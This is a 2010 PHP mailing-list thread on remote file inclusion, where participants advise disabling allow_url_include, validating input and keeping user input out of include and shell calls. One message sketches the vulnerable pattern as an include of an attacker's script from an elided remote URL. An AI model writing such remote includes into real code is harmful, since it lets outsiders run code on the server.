Yes and scrubbing the input to ensure the field used for this URL rejects certain characters or does sanity checking on it would also be another suggestion. Turning this off would fix remote include requests. But still need to check for people requesting local files. Should never take user input and put it directly into include or shell execs or anything.

On Jun 8, 2010, at 11:55 AM, "David Stoltz" <> wrote:

allow_url_include is (or should be) disabled by default.

I can't think of one good reason to ever enable this, it would be a
security issue no matter how you slice it...

-----Original Message-----
From: Igor Escobar []
Sent: Tuesday, June 08, 2010 10:11 AM
Cc: <>
Subject: Re: [PHP] Security Issue

Hey Richard,

I'll find more about this parameter allow_url_include, thank you!

Igor Escobar
Systems Analyst & Interface Designer

+ @igorescobar (twitter)

On Mon, Jun 7, 2010 at 5:26 PM, richard gray <> wrote:

On 07/06/2010 20:00, Igor Escobar wrote:

PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external
that is interpreted as an inner code as if the code included was more
of the script.

// my code...
// my code...
include ('http://..../externalhackscript.txt');
//my code...
//my code..

can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. /allow_url_include = Off in php.ini


PHP General Mailing List (
To unsubscribe, visit:

PHP General Mailing List (
To unsubscribe, visit:

Reply via email to